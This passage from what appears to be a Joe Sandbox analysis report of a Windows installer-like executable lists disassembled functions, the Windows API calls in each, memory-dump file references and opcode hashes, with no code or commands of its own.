                                                                                                                        • Instruction Fuzzy Hash: 32F09A70640306AADB54AFA69C0679E3AA0BB08349F20983EE411E52B0DFBCC5108B1D
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000400,?), ref: 004312F8
                                                                                                                        • GetLastError.KERNEL32 ref: 00431302
                                                                                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 004313CB
                                                                                                                        • GetLastError.KERNEL32 ref: 004313D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1948546556-0
                                                                                                                        • Opcode ID: fc517802bf9863005fcb3632d1bfaa85c075bd97ca757f21effb5126a677eff1
                                                                                                                        • Instruction ID: 191bc55e6a285dc79099745201b46e499ca68c129fd5b025dbec7fdafe6e4a6e
                                                                                                                        • Opcode Fuzzy Hash: fc517802bf9863005fcb3632d1bfaa85c075bd97ca757f21effb5126a677eff1
                                                                                                                        • Instruction Fuzzy Hash: 6F61D930604385DFDB21CF58C884B9A7BF4BF1A304F14559BE8618B3A2D778D946CB1A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00408060: VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                          • Part of subcall function 0042400B: __lock.LIBCMT ref: 00424029
                                                                                                                          • Part of subcall function 0042400B: HeapFree.KERNEL32(00000000,?,0044C948,0000000C,0042981C,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00424070
                                                                                                                        • Sleep.KERNEL32(00000001), ref: 004016EA
                                                                                                                        • Sleep.KERNEL32(00000001), ref: 004017C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$FreeHeapProtectVirtual__lock
                                                                                                                        • String ID: DXInstalled = %d$InstallDirectXIfRequired
                                                                                                                        • API String ID: 715370876-4124889539
                                                                                                                        • Opcode ID: bdc4443d0d3ec1e238e24dd1fd3f35842bfbf80ed1653aedad27dd03790dd8a6
                                                                                                                        • Instruction ID: 364755a666ca341e749ee64d0003a40c6949535c43a42a4e9d33c4ab1bb0a936
                                                                                                                        • Opcode Fuzzy Hash: bdc4443d0d3ec1e238e24dd1fd3f35842bfbf80ed1653aedad27dd03790dd8a6
                                                                                                                        • Instruction Fuzzy Hash: E851C4716487006BD300EB94FC42FAB3BA9AB85706F04847EFD44A72D3DA79D5048B6E
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0042C8FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: 72ef37e3f52f69ed0ec66c4e8790f2510e5f96e623d6d1493fedeb9f51a5ca00
                                                                                                                        • Instruction ID: 8280d1e270eca7936ff5276bf182434933e20333d3727ff594148b0d188492fc
                                                                                                                        • Opcode Fuzzy Hash: 72ef37e3f52f69ed0ec66c4e8790f2510e5f96e623d6d1493fedeb9f51a5ca00
                                                                                                                        • Instruction Fuzzy Hash: 48517FB1A04268DFDB22DFA9EC80BEDBBB8FF46304F50411AE8559B252DB345A41CF15
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00428705
                                                                                                                          • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                        • __lock.LIBCMT ref: 00428751
                                                                                                                        • EnterCriticalSection.KERNEL32(0000008C,0044CD58,00000014,00432A14,?,?,00000000), ref: 0042879B
                                                                                                                        • LeaveCriticalSection.KERNEL32(0000008C), ref: 004287A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Enter__lock$Leave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 885841014-0
                                                                                                                        • Opcode ID: a01da40aeaf7a3bb659276398149747342c523524fdf739e22d43d76ee2309d8
                                                                                                                        • Instruction ID: b3503f7208acb3f95ac1f212b98e40c77cfa49c85add1a9a95d8a4e58ead19da
                                                                                                                        • Opcode Fuzzy Hash: a01da40aeaf7a3bb659276398149747342c523524fdf739e22d43d76ee2309d8
                                                                                                                        • Instruction Fuzzy Hash: 98411771A023228AD710AF65EC4576E7BA0AF41324FA4862FD121962D1DF7C9541CB1C
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,?,?), ref: 00417386
                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 004173B1
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 004173C1
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004173CE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteEnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4142876296-0
                                                                                                                        • Opcode ID: e88a5e974ed7bd7e7be99ffb565bc9357ecc90e66e98b9816a88c69fb15ff6d6
                                                                                                                        • Instruction ID: 816ecf25c106d77b39d132cd8e82fa92df93f4f8198aa37a08063b162ff1abf5
                                                                                                                        • Opcode Fuzzy Hash: e88a5e974ed7bd7e7be99ffb565bc9357ecc90e66e98b9816a88c69fb15ff6d6
                                                                                                                        • Instruction Fuzzy Hash: EA016DB6204201AFE320CB54DC49FEBB7ACEB89B04F00852DBA95D2151D6749804CBA6
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___addl
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2260456530-0
                                                                                                                        • Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
                                                                                                                        • Instruction ID: 9a3622a891a97d8ac40710fbd079e3f9d72052691bd83aec0a43e73614e04fb6
                                                                                                                        • Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
                                                                                                                        • Instruction Fuzzy Hash: CAF0F032400606BFCB225F02DC01EA3B7EDFF19301F04142AFD698A131E722EA69CB51
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,00446A11,00000001), ref: 004118EB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: %c:\$common_filelist.txt
                                                                                                                        • API String ID: 1611563598-3546436211
                                                                                                                        • Opcode ID: bf4860426ae5a8c665500b95706d3b05aabf3409a8e98bf8efb5ed0b0f1f40b4
                                                                                                                        • Instruction ID: 075e01302480f862047a0cd229708d3c32eb167a873184b3eb99f0da593a5d69
                                                                                                                        • Opcode Fuzzy Hash: bf4860426ae5a8c665500b95706d3b05aabf3409a8e98bf8efb5ed0b0f1f40b4
                                                                                                                        • Instruction Fuzzy Hash: 2E815FB16043406AD320EB659C41FFB77D89F85304F44482FFA8593292EB7CD949CB6A
                                                                                                                        APIs
                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 0040F3C8
                                                                                                                        Strings
                                                                                                                        • No Languages Selected!, xrefs: 0040F3B5
                                                                                                                        • Corrupted AutoRun.CFG File, xrefs: 0040F3B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DefaultLangUser
                                                                                                                        • String ID: Corrupted AutoRun.CFG File$No Languages Selected!
                                                                                                                        • API String ID: 768647712-574851024
                                                                                                                        • Opcode ID: d9ad3f59bbd157dacd61f4ff9f055d84f5177f32f5bf328f948fb3637ce815af
                                                                                                                        • Instruction ID: 53668502b466ec9360e6261e60baa1c822bb85f3723ac8f7f48d7bf6175b14eb
                                                                                                                        • Opcode Fuzzy Hash: d9ad3f59bbd157dacd61f4ff9f055d84f5177f32f5bf328f948fb3637ce815af
                                                                                                                        • Instruction Fuzzy Hash: BA4104319047525BC736CB3C8444267FB91AF96314F0982BBDC94ABB92C334A94EC784
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,00446A11,00000001), ref: 004118EB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
